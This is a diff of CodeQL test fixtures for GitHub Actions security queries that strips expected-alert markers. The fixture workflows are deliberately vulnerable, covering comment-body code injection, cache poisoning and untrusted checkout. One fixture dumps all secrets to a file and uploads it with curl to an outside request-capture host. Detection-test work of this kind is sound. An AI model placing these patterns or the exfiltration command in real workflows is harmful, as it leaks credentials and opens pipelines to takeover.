test4: runs-on: self-hosted-azure steps: - run: cmd - test5: # $ Alert + test5: strategy: fail-fast: false matrix: @@ -63,7 +63,7 @@ jobs: runs-on: ${{ matrix.os }} steps: - run: cmd - test8: # $ Alert + test8: strategy: matrix: settings: 
@@ -75,14 +75,14 @@ jobs: runs-on: ${{ matrix.settings.host }} steps: - run: cmd - test9: # $ Alert + test9: strategy: matrix: os: ${{ github.repository }} runs-on: ${{ matrix.os }} steps: - run: cmd - test10: # $ Alert + test10: strategy: matrix: os: ${{ github.repository }} @@ -91,4 +91,4 @@ jobs: baz: "asdf" runs-on: ${{ matrix.foo.bar }} steps: - - run: cmd # $ Alert + - run: cmd diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref index 3c21812c0e7a..dc99068b3035 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref +++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref @@ -1,2 +1,2 @@ -query: experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml index 4c8aa982c31a..48833460b44b 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml @@ -17,4 +17,4 @@ jobs: if: contains(github.event.pull_request.labels.*.name, 'safe to test') with: ref: ${{ github.event.pull_request.head.ref }} - - run: ./cmd # $ Alert + - run: ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref index c62fedc2e7d8..09a19f21e3cb 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref +++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref 
@@ -1,2 +1,2 @@ -query: Security/CWE-285/ImproperAccessControl.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-285/ImproperAccessControl.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index 4d09af11cfd5..473d59986957 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -11,7 +11,7 @@ jobs: with: name: file path: . - test2: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] + test2: # NOT VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -29,7 +29,7 @@ jobs: with: name: file path: "*" - test4: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] + test4: # VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -40,7 +40,7 @@ jobs: with: name: file path: foo - test5: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] + test5: # VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -51,7 +51,7 @@ jobs: with: name: file path: foo/* - test6: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] + test6: # NOT VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -83,5 +83,5 @@ jobs: uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 with: name: file - path: . # $ Alert[actions/secrets-in-artifacts] + path: . diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml index d476fab3ce46..614efab34c98 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml 
@@ -9,17 +9,17 @@ jobs: TOKENS: [WRITE, READ] steps: - run: | - echo '${{ toJSON(secrets) }}' > secrets.txt # $ Alert[actions/excessive-secrets-exposure] + echo '${{ toJSON(secrets) }}' > secrets.txt curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com - env: - ALL_SECRETS: ${{ toJSON(secrets) }} # $ Alert[actions/excessive-secrets-exposure] + ALL_SECRETS: ${{ toJSON(secrets) }} run: echo "$ALL_SECRETS" - env: - SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} # $ Alert[actions/excessive-secrets-exposure] + SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} run: echo "$SOME_SECRETS" - env: - username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} # $ Alert[actions/unmasked-secret-exposure] - password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} # $ Alert[actions/unmasked-secret-exposure] + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} run: | echo "$username" echo "$password" diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref index 2341eea4546e..45f5ad80fd98 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-312/ExcessiveSecretsExposure.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-312/ExcessiveSecretsExposure.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref index ea9ad38301f2..c9bb538a12d3 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref 
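Review bot: The unchanged context line `curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com` in CWE-312/test1.yml still names what looks like a third-party request-capture host. Judging by the removed markers, the queries sharing this fixture key on the `${{ toJSON(secrets) }}`, `secrets[format(...)]` and `fromJson(secrets.AZURE_CREDENTIALS)` expressions rather than on the URL, so a reserved name should not change the results: `curl -X PUT -T ./secrets.txt -H http://sink.example.invalid`. A fixture that is copied into a real workflow by mistake then cannot send data to a host the project does not control.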
@@ -1,2 +1,2 @@ -query: Security/CWE-312/SecretsInArtifacts.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-312/SecretsInArtifacts.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref index be8a489a18b4..ad4c84615237 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-312/UnmaskedSecretExposure.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-312/UnmaskedSecretExposure.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml index ffd8410a1a86..9f19634abc92 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml @@ -8,5 +8,5 @@ jobs: runs-on: ubuntu-latest steps: - run: | - echo ${{ github.event.comment.body }} # $ Alert[actions/cache-poisoning/code-injection] + echo ${{ github.event.comment.body }} diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml index 7d6556c97c05..55efe8e9fec9 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml @@ -15,9 +15,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison 
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml index a6413290212a..eb6373a406eb 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml @@ -11,9 +11,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml index 85a8d067f604..3849d92cbcca 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml @@ -16,9 +16,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml index 896c22d9243c..d3f51456de2d 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml 
@@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml index 1faedcf1b916..ec0f9b0e6c94 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml @@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index a17b62dbafff..b9652d46b59f 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Set up Python 3.10 # $ Source[actions/cache-poisoning/direct-cache] + - name: Set up Python 3.10 uses: actions/setup-python@v5 with: python-version: "3.10" @@ -23,4 +23,4 @@ jobs: with: path: ./results/pip key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} - restore-keys: ${{ runner.os }}-pip- # $ Alert[actions/cache-poisoning/direct-cache] + restore-keys: ${{ runner.os }}-pip- 
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml index d99592c830f9..05f8e4a067a1 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml @@ -12,9 +12,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: ./checkedout/poison # $ Source[actions/cache-poisoning/poisonable-step] + - run: ./checkedout/poison - pr-comment2: # $ Alert[actions/cache-poisoning/poisonable-step] + pr-comment2: runs-on: ubuntu-latest permissions: read-all steps: @@ -23,9 +23,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: ./.github/actions/node-npm-setup # $ Source[actions/cache-poisoning/poisonable-step] + - uses: ./.github/actions/node-npm-setup - pr-comment3: # $ Alert[actions/cache-poisoning/poisonable-step] + pr-comment3: runs-on: ubuntu-latest permissions: read-all steps: @@ -34,4 +34,4 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: node .github/actions-scripts/what-docs-early-access-branch.js # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] + - run: node .github/actions-scripts/what-docs-early-access-branch.js diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml index 60be3c02edb0..60ba26406c62 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml 
@@ -17,11 +17,11 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] + - name: Setup Pages uses: actions/configure-pages@v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@v1 with: source: ./ - destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] + destination: ./_site diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml index 7ceb82a536f1..8539bf2bda43 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -16,4 +16,4 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm run build -w www # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] + - run: npm run build -w www diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml index 33d28c1f292d..6e2351c17446 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -15,4 +15,4 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: ./foo # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] + - run: ./foo 
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml index 082585088b1d..9742bd01a48a 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -19,10 +19,10 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] + - name: Setup Pages uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ - destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] + destination: ./_site diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index be669230722c..9cfac091f675 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected 
@@ -1,5 +1,3 @@ -#select -| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | nodes @@ -8,3 +6,5 @@ nodes | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref index 62a04c8718c8..8ac48aad93e0 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref 
@@ -1,2 +1,2 @@ -query: Security/CWE-349/CachePoisoningViaCodeInjection.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-349/CachePoisoningViaCodeInjection.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index 4014714be4b7..4cc8536b5943 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected 
@@ -1,10 +1,3 @@ -#select -| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | 
@@ -50,3 +43,10 @@ edges | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref index 0002f755786f..9d1910990fc0 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-349/CachePoisoningViaDirectCache.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-349/CachePoisoningViaDirectCache.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index 57a1fd7b8d87..6b1a3e873134 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected 
@@ -1,11 +1,3 @@ -#select -| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | 
@@ -51,3 +43,11 @@ edges | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | 